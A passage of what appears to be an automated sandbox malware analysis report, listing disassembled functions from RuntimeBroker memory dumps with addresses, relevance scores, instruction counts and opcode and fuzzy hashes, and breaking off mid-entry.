                                                                                    • Opcode ID: 193dd68cd01778b81dffcb33eee519d6451f8adf54fc4537c6a69fe7f54e7836
                                                                                    • Instruction ID: 47ecd92017654f446d464f81c4b290c85482a5d360a187015411514489a6a6f4
                                                                                    • Opcode Fuzzy Hash: 193dd68cd01778b81dffcb33eee519d6451f8adf54fc4537c6a69fe7f54e7836
                                                                                    • Instruction Fuzzy Hash: 5F519CB0E2950ECFDB59DB98C4A45FDB7B1FF46300F15007AC11AE7296CA386805DB90
                                                                                    Function 00007FFD343E0960 Relevance: 1.4, Strings: 1, Instructions: 116COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000011.00000002.3526531662.00007FFD343E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_17_2_7ffd343e0000_RuntimeBroker.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: (7I4
                                                                                    • API String ID: 0-1709812513
                                                                                    • Opcode ID: 5087e3f2b58b59c0a677272ab04028e72abd833565c5f4050b224bd14e519034
                                                                                    • Instruction ID: 8e29eac825fc3a892da7849d5886772eb2ff4e49dbfcdc0e12a7c8327c2f00c1
                                                                                    • Opcode Fuzzy Hash: 5087e3f2b58b59c0a677272ab04028e72abd833565c5f4050b224bd14e519034
                                                                                    • Instruction Fuzzy Hash: BA310622B0E9191AE765F7AC64A66FA73D5DF49325F1800BAD40EC31D3CD2DAC824280
                                                                                    Function 00007FFD343E0998 Relevance: 1.3, Strings: 1, Instructions: 99COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000011.00000002.3526531662.00007FFD343E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_17_2_7ffd343e0000_RuntimeBroker.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: (7I4
                                                                                    • API String ID: 0-1709812513
                                                                                    • Opcode ID: 46445e6eb19786c3fd40b090941a27675934c7f80e063eb33e89dadaac5e7325
                                                                                    • Instruction ID: ec291468aa96792a7aada4c99059b16646e3625ac952b39f621682edd84f428d
                                                                                    • Opcode Fuzzy Hash: 46445e6eb19786c3fd40b090941a27675934c7f80e063eb33e89dadaac5e7325
                                                                                    • Instruction Fuzzy Hash: 4C212821B1A95D0FE794F66C94AA6B977C1EB89314F1800BDE40EC32D3DD3CAC828640
                                                                                    Function 00007FFD343F3DE9 Relevance: 1.3, Strings: 1, Instructions: 28COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000011.00000002.3526531662.00007FFD343F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343F0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_17_2_7ffd343f0000_RuntimeBroker.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: M
                                                                                    • API String ID: 0-3664761504
                                                                                    • Opcode ID: f7ba76cc6caa1d35af2fbcf404c8cdebd9418b273fa991598286f8ca28e0404a
                                                                                    • Instruction ID: 778425cac4266aed0294f3a97e10546f00a5423ae4d37f02fc37ff4922add963
                                                                                    • Opcode Fuzzy Hash: f7ba76cc6caa1d35af2fbcf404c8cdebd9418b273fa991598286f8ca28e0404a
                                                                                    • Instruction Fuzzy Hash: 46F0657194F3C04FCB5AAA3588A94547F60EF6720174A51EEC095CF1E7DA2DDC85C701
                                                                                    Function 00007FFD347D0D37 Relevance: .5, Instructions: 525COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000011.00000002.3534445171.00007FFD347D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_17_2_7ffd347d0000_RuntimeBroker.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: e87bbc1b0b72dbdecc4dfa6c627b818f9589dd18df27dc333edd9cffd28de247
                                                                                    • Instruction ID: f356f8860f1215f828a10885fbb1047e018c83e45ad2d2acc37274f3bfe78280
                                                                                    • Opcode Fuzzy Hash: e87bbc1b0b72dbdecc4dfa6c627b818f9589dd18df27dc333edd9cffd28de247
                                                                                    • Instruction Fuzzy Hash: CB31F692F2F6D6CAF769522924B50BC7B805F47328F28A57BD68DC60C2DD0C344872C2
                                                                                    Function 00007FFD347DBBE2 Relevance: .5, Instructions: 522COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000011.00000002.3534445171.00007FFD347D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_17_2_7ffd347d0000_RuntimeBroker.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 10c60074b50f11be0ce60277c6c25bb00f9f90a589beacb385e4683083d76c4a
                                                                                    • Instruction ID: 32e306da33a86c6642c0b3fc2cb76d44427629a34e31e41893fe8ed292c9220c
                                                                                    • Opcode Fuzzy Hash: 10c60074b50f11be0ce60277c6c25bb00f9f90a589beacb385e4683083d76c4a
                                                                                    • Instruction Fuzzy Hash: 82F1D93471C8198FDBC8FB68D4A5E6573D2EBA8704B1540A9E10FC72B6CE25EC56CB81
                                                                                    Function 00007FFD347D8B0A Relevance: .4, Instructions: 427COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000011.00000002.3534445171.00007FFD347D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_17_2_7ffd347d0000_RuntimeBroker.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: fe11e60891f300c0e6b2b0a0f5507df011906a27b6ec7be19d56fa83c5e0d584
                                                                                    • Instruction ID: 7e6e2190e7edb7d1fdd2cb57664613d8cbcc315bb1cf6528040266134dd739df
                                                                                    • Opcode Fuzzy Hash: fe11e60891f300c0e6b2b0a0f5507df011906a27b6ec7be19d56fa83c5e0d584
                                                                                    • Instruction Fuzzy Hash: 75F1D0B062A545CFEB59CF18C4E06B477A1FF46300B5545BDC95ACB69ACA3CF885CB80
                                                                                    Function 00007FFD347D4AE1 Relevance: .4, Instructions: 420COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000011.00000002.3534445171.00007FFD347D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_17_2_7ffd347d0000_RuntimeBroker.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 4ad78bf1cf8188437cb6158bce1e42d8d042f9e79e7b9932090d1dbcff5af299
                                                                                    • Instruction ID: 4f7b652235cc5705c196bdbe44e91638bc88c1a2291019e0df99d3819516078f
                                                                                    • Opcode Fuzzy Hash: 4ad78bf1cf8188437cb6158bce1e42d8d042f9e79e7b9932090d1dbcff5af299
                                                                                    • Instruction Fuzzy Hash: 60E11470A2EB468FE368DB28D4E0575B7E1FF47304B14067EC58EC7582DA2DB84A9781
                                                                                    Function 00007FFD347D3A98 Relevance: .4, Instructions: 404COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000011.00000002.3534445171.00007FFD347D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_17_2_7ffd347d0000_RuntimeBroker.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 6cef0f31e56af6cbb2b339fbe7f5c9c820b57917b90c0957c4be8fce9eae384a
                                                                                    • Instruction ID: c91e09a1202702516aa1cc8e067447d03e2339430040ce3c05a02627ffd5a6dd
                                                                                    • Opcode Fuzzy Hash: 6cef0f31e56af6cbb2b339fbe7f5c9c820b57917b90c0957c4be8fce9eae384a
                                                                                    • Instruction Fuzzy Hash: 83E17D706295568BEB59CF18C4E16B577A1FF46300B5442B9C94ACB28ACA38F886DB81
                                                                                    Function 00007FFD347D3352 Relevance: .3, Instructions: 329COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000011.00000002.3534445171.00007FFD347D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_17_2_7ffd347d0000_RuntimeBroker.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 5b4d3076c2c94d8f4cf4305b29070581d0e02b43263d07a896c9854e6e4b42c9
                                                                                    • Instruction ID: 46efc79479f755465b522e5c2c7a9748230753800527b1b7de6ee3be71c84612
                                                                                    • Opcode Fuzzy Hash: 5b4d3076c2c94d8f4cf4305b29070581d0e02b43263d07a896c9854e6e4b42c9
                                                                                    • Instruction Fuzzy Hash: 9FC1D1B0B2DA468FE749DB28C4A16A4B7A1FF4A300F444579D14EC7A86CB2CB85687D0
                                                                                    Function 00007FFD347D83A2 Relevance: .3, Instructions: 322COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000011.00000002.3534445171.00007FFD347D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_17_2_7ffd347d0000_RuntimeBroker.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: e146ef460286b38e7093041325de3e3bf7fa56e67da006b7b1a81208c1c41855
                                                                                    • Instruction ID: 85b190e56a32a54121e50a86337ed34d32d09ae19052d9fdb9f9ce7c329390dd
                                                                                    • Opcode Fuzzy Hash: e146ef460286b38e7093041325de3e3bf7fa56e67da006b7b1a81208c1c41855
                                                                                    • Instruction Fuzzy Hash: 22B112B0B29A468FE349DB28C4A06B4B7A1FF4A310F454179C15EC7A97DB2CB8558BD0
                                                                                    Function 00007FFD347D3ABF Relevance: .3, Instructions: 318COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000011.00000002.3534445171.00007FFD347D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_17_2_7ffd347d0000_RuntimeBroker.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: d29f6c42f5dd853ff1d5b699a818c330680091b3110206dbc8e5239fc264f871
                                                                                    • Instruction ID: 602ec9c9a0b3ea1c84f105c63e9a89e5206835b9f4fffb48a00acc2ff878a385
                                                                                    • Opcode Fuzzy Hash: d29f6c42f5dd853ff1d5b699a818c330680091b3110206dbc8e5239fc264f871
                                                                                    • Instruction Fuzzy Hash: 81C1AF70629546CBEB19CF18C4E05B537A1FF46300B5446BDD94BCB68ACA3CF886DB81
                                                                                    Function 00007FFD347D5D67 Relevance: .3, Instructions: 309COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000011.00000002.3534445171.00007FFD347D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_17_2_7ffd347d0000_RuntimeBroker.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: e92001671f7925e8ac17c80f8230c384c033716b9896fb50e551fb16763307c7
                                                                                    • Instruction ID: 06cb2c30aef9e96d626341f7ce765e478fe93233a54de923af6b8e52ab7042ed
                                                                                    • Opcode Fuzzy Hash: e92001671f7925e8ac17c80f8230c384c033716b9896fb50e551fb16763307c7
                                                                                    • Instruction Fuzzy Hash: 2121D582F2E193CBF6A9626D24F51F83A405F972A1F180677D24EDA1C2DC0C788932C2
                                                                                    Function 00007FFD347D2886 Relevance: .3, Instructions: 302COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000011.00000002.3534445171.00007FFD347D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_17_2_7ffd347d0000_RuntimeBroker.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 1ea92ccc7da6383c36218704e7dad1fd09a23c32cf7a16c3634b8606f57d3254
                                                                                    • Instruction ID: 1c2d2f5542ef19be2c64db87ea76cf0820cacaef7904e48827341070e802179c
                                                                                    • Opcode Fuzzy Hash: 1ea92ccc7da6383c36218704e7dad1fd09a23c32cf7a16c3634b8606f57d3254
                                                                                    • Instruction Fuzzy Hash: 63918C71B2EA468FE3399A2894A51B577D0EF93310B14057ED58FC3183DE2CB80B9791
                                                                                    Function 00007FFD347D78EB Relevance: .3, Instructions: 259COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000011.00000002.3534445171.00007FFD347D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_17_2_7ffd347d0000_RuntimeBroker.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 4322c97e51c9551a6476cc8e08a7a0171f4c3ce184f21648b1a01329aa87e1df
                                                                                    • Instruction ID: 3c95198801618c724e8ac414436fca8424b419f29fd2b6cbf4259c1be712da1c
                                                                                    • Opcode Fuzzy Hash: 4322c97e51c9551a6476cc8e08a7a0171f4c3ce184f21648b1a01329aa87e1df
                                                                                    • Instruction Fuzzy Hash: C88139B2B2EA468FE3759A1C94A11F977E1EF87310B14057ED58EC3182DE2C790A57C1
                                                                                    Function 00007FFD347D7F00 Relevance: .2, Instructions: 235COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000011.00000002.3534445171.00007FFD347D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_17_2_7ffd347d0000_RuntimeBroker.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: f2223d5c3b9f025823d8f1ef8aa9e6933f9113653a8d13e1d53b29cd07ab27e5
                                                                                    • Instruction ID: f51c5a16615dde019649f835052ee028663938ddb60975217e40be76fbfaa037
                                                                                    • Opcode Fuzzy Hash: f2223d5c3b9f025823d8f1ef8aa9e6933f9113653a8d13e1d53b29cd07ab27e5
                                                                                    • Instruction Fuzzy Hash: 0071056061D7C68FD71A8B2888B10B47BA0EF47214B2946BEC1DBCB5D3D91DA84BD391
                                                                                    Function 00007FFD347D65DB Relevance: .2, Instructions: 232COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000011.00000002.3534445171.00007FFD347D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_17_2_7ffd347d0000_RuntimeBroker.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 0936b92794f98d6218f0c29a6d4ff29f3cb8f3de5c05ab9730618d3cf6bdf867
                                                                                    • Instruction ID: f9ca22b751bbfc566fabc5745fbf6d22f27d7e7de26f65c6d126eb1ed9b755a9
                                                                                    • Opcode Fuzzy Hash: 0936b92794f98d6218f0c29a6d4ff29f3cb8f3de5c05ab9730618d3cf6bdf867
                                                                                    • Instruction Fuzzy Hash: 5471F470A2D54ECFEB65EB6488A46BD7BB4EF57300F1005BAD10ED71A2DA2C78499780
                                                                                    Function 00007FFD347D0FC5 Relevance: .2, Instructions: 156COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000011.00000002.3534445171.00007FFD347D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_17_2_7ffd347d0000_RuntimeBroker.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 4c25983e88d4a9d7a40cc33922a5e28ed28c3962157e5d8edb7fed471c547697
                                                                                    • Instruction ID: 72648960b6f0c06233aa190ab9679f27946b08a9264a7bf6f28a519d2c71ecfd
                                                                                    • Opcode Fuzzy Hash: 4c25983e88d4a9d7a40cc33922a5e28ed28c3962157e5d8edb7fed471c547697
                                                                                    • Instruction Fuzzy Hash: F0516F70A1955D8FDB98EB18C4A0BB877F0FF56300F1441BAD10DE3291DA396985DF90
                                                                                    Function 00007FFD347D5107 Relevance: .1, Instructions: 127COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000011.00000002.3534445171.00007FFD347D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_17_2_7ffd347d0000_RuntimeBroker.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: f80ef6a04d57ddb84698dbfda7a9d3cf608259f2fde144eccedfaf7d3a82d123
                                                                                    • Instruction ID: 68dce1c3957c284349dcc3b0f1a68229fa59851a95999c05e74fb36fc4864df6
                                                                                    • Opcode Fuzzy Hash: f80ef6a04d57ddb84698dbfda7a9d3cf608259f2fde144eccedfaf7d3a82d123
                                                                                    • Instruction Fuzzy Hash: 0A41507260D9098FDF98FB18C4A5EA4B7E1FBA9314B04016AD04EC3292DE25FC45DB81
                                                                                    Function 00007FFD347DA157 Relevance: .1, Instructions: 126COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000011.00000002.3534445171.00007FFD347D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_17_2_7ffd347d0000_RuntimeBroker.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 2da5d1b25b01acfb4c7cb89ba9adbbfdca254d4dc98ea587621280ba1f77514f
                                                                                    • Instruction ID: d28297b130939de9d9417372d25b9dd390c519fc17e516a3b7f8663335352f0b
                                                                                    • Opcode Fuzzy Hash: 2da5d1b25b01acfb4c7cb89ba9adbbfdca254d4dc98ea587621280ba1f77514f
                                                                                    • Instruction Fuzzy Hash: B641553170C9488FDF98FF1CC4A5DA5B3E1FB69324B04016AD14AC7292DE29F845DB81
                                                                                    Function 00007FFD347DA201 Relevance: .1, Instructions: 120COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000011.00000002.3534445171.00007FFD347D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_17_2_7ffd347d0000_RuntimeBroker.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: ade9179631be8f3d9f7363f7983c36979465f9055428916fd58580d5e1db873e
                                                                                    • Instruction ID: 63f182aa27ef69a8914b1b409e29359cce84dc8ea3a1fb8733ed8c5bf8bf3f38
                                                                                    • Opcode Fuzzy Hash: ade9179631be8f3d9f7363f7983c36979465f9055428916fd58580d5e1db873e
                                                                                    • Instruction Fuzzy Hash: 4531643160C9488FDF99FF1CC4A5D6573E1FB69314B0401AAD44AC7292DE29F845CB81
                                                                                    Function 00007FFD347D51B1 Relevance: .1, Instructions: 120COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000011.00000002.3534445171.00007FFD347D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_17_2_7ffd347d0000_RuntimeBroker.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: fb36dc8aacfdb005786dbee14c63f507a1fe450422f20ea1d95a77c25fd0db77
                                                                                    • Instruction ID: b566b83c0106b411e3ffd23fc7d2f430ab1f3afab891d48cc0802ad251a1d4a0
                                                                                    • Opcode Fuzzy Hash: fb36dc8aacfdb005786dbee14c63f507a1fe450422f20ea1d95a77c25fd0db77
                                                                                    • Instruction Fuzzy Hash: E7317E3160C9488FCB99FB18C4A5EA4B3E1FBA9314B0402AED04AC7292CE25FC45DB81
                                                                                    Function 00007FFD347D514B Relevance: .1, Instructions: 115COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000011.00000002.3534445171.00007FFD347D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_17_2_7ffd347d0000_RuntimeBroker.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 144b195acf00f3a9c6f2e5a3147dd1accc3726441dedea85f6f263db179e8fb1
                                                                                    • Instruction ID: 8cd973c37b4b8ed619cfb4610f1a16eba33c88d2a0fa667240dab3662347936f
                                                                                    • Opcode Fuzzy Hash: 144b195acf00f3a9c6f2e5a3147dd1accc3726441dedea85f6f263db179e8fb1
                                                                                    • Instruction Fuzzy Hash: C531507160C9498FDF98FF18C4A5EA4B3E1FBA9314B04016ED04EC7292DE29F845DB81
                                                                                    Function 00007FFD347DA19B Relevance: .1, Instructions: 115COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000011.00000002.3534445171.00007FFD347D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_17_2_7ffd347d0000_RuntimeBroker.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: a8d3db3b13aadc1d867c6857e77af32d9bea8bbec681cafcead6f870345a64b2
                                                                                    • Instruction ID: e14d8760ddfc7b59064ebfba2390fbd9b3814fce6d5536824344d8d9280f9224
                                                                                    • Opcode Fuzzy Hash: a8d3db3b13aadc1d867c6857e77af32d9bea8bbec681cafcead6f870345a64b2
                                                                                    • Instruction Fuzzy Hash: 1D31527170C9498FDF98FF2CC4A5EA5B3E1FBA9314B14016AD04AC7292DE29F845DB81
                                                                                    Function 00007FFD347D59A0 Relevance: .1, Instructions: 111COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000011.00000002.3534445171.00007FFD347D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_17_2_7ffd347d0000_RuntimeBroker.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 1c225c106873bd09d4e4681532fce1b9073909cfe56126a797e397744803dc1c
                                                                                    • Instruction ID: 57e57720dd5423e8fb01075bb9ac634fc32e829f16a0212d59ebb1df1581b89b
                                                                                    • Opcode Fuzzy Hash: 1c225c106873bd09d4e4681532fce1b9073909cfe56126a797e397744803dc1c
                                                                                    • Instruction Fuzzy Hash: BE31D671B1D949CFE7E8DF2888A56B837D1FF4A351B04017ED54EC76A2DE28B8069780
                                                                                    Function 00007FFD347DD56D Relevance: .1, Instructions: 110COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000011.00000002.3534445171.00007FFD347D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_17_2_7ffd347d0000_RuntimeBroker.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 9486eb9bdc4c4a4d403f0b5836aaa6d12aed5d63a9ada7712f73562b99bcf79f
                                                                                    • Instruction ID: 465bbf669435fa1a7667857b41c6933e149f1709d4c79d1c8156036455461325
                                                                                    • Opcode Fuzzy Hash: 9486eb9bdc4c4a4d403f0b5836aaa6d12aed5d63a9ada7712f73562b99bcf79f
                                                                                    • Instruction Fuzzy Hash: 9B312271B199099FDB44DA1CD8A19A9B7A2FF8A310B54413AD14ED3686CF38BC52C7C0
                                                                                    Function 00007FFD347D228B Relevance: .1, Instructions: 101COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000011.00000002.3534445171.00007FFD347D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_17_2_7ffd347d0000_RuntimeBroker.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 588598658691a20030ff63e867c799d0f3c6ef506c04bafe71b8da18eeebcb65
                                                                                    • Instruction ID: 5c90fb03c9828c90c158fc3124c1b7728af636edef8f0196a7cd5242db175e8b
                                                                                    • Opcode Fuzzy Hash: 588598658691a20030ff63e867c799d0f3c6ef506c04bafe71b8da18eeebcb65
                                                                                    • Instruction Fuzzy Hash: 6A31AD71B1990A8FDB44DB28C5E29A8F7A1FF5A320B014279D54ED7286CB28BC138780
                                                                                    Function 00007FFD347D06B1 Relevance: .1, Instructions: 99COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000011.00000002.3534445171.00007FFD347D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_17_2_7ffd347d0000_RuntimeBroker.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: e797e9482f4aee0b0ef58a2553b9785fefa946cf4cef47021f50a56afbdd8b63
                                                                                    • Instruction ID: 657b14997c735b17c8601e95c373bcf5d9d0a7c9ec25757b5cf172dce96e153e
                                                                                    • Opcode Fuzzy Hash: e797e9482f4aee0b0ef58a2553b9785fefa946cf4cef47021f50a56afbdd8b63
                                                                                    • Instruction Fuzzy Hash: 07318070E1E6CD9FDB51DB68C8A05AD7BB0FF4B314F0400BAC149E7192DA296809DB91
                                                                                    Function 00007FFD347D72BD Relevance: .1, Instructions: 99COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000011.00000002.3534445171.00007FFD347D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_17_2_7ffd347d0000_RuntimeBroker.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: a89a9f457e55f2c0319d8c81b87d6a59fb274550951e45903da9ee746fe94d33
                                                                                    • Instruction ID: ea921443179797f4a230aa8ace275be8a13b4e2473677f2041472e2dd4a8f6f5
                                                                                    • Opcode Fuzzy Hash: a89a9f457e55f2c0319d8c81b87d6a59fb274550951e45903da9ee746fe94d33
                                                                                    • Instruction Fuzzy Hash: 63317071B0994A8FD744DB58D5E19A8F7A1FF46310B50427AD54ED3686CB28BD128BC0
                                                                                    Function 00007FFD347D0665 Relevance: .1, Instructions: 98COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000011.00000002.3534445171.00007FFD347D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_17_2_7ffd347d0000_RuntimeBroker.jbxd
                                                                                    Similarity
                                                                                    • API ID:
